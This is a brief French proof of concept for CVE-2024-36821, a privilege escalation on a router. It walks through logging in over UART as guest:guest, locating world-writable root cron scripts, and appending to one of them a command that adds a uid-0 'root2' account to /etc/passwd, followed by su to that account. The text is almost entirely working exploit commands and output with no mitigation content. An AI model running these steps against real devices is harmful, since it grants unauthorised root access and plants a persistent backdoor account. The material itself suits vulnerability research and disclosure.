
La référence publique qui contient les informations minimales requises pour la vulnérabilité couverte par CVE-2024-36821.
La référence publique contenant les informations minimales requises pour la vulnérabilité couverte par CVE-2024-36821
Connectez-vous au routeur via une connexion UART
En utilisant les identifiants guest:guest, connectez-vous au système
En utilisant la commande find / -perm -777 -type f 2>/dev/null, trouvez les fichiers avec les permissions lecture-écriture-exécution :
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
Vérifiez le propriétaire avec la commande ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh
Générez le mot de passe avec la commande openssl passwd Abracadabra
Éditez /tmp/cron/cron.everyminute/conntrack_collector.sh, en ajoutant à la fin le nouveau mot de passe généré :
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
Attendez une minute
Changez d'utilisateur vers root2 avec la commande suivante
/ $ su root2
Password: Abracadabra
~ #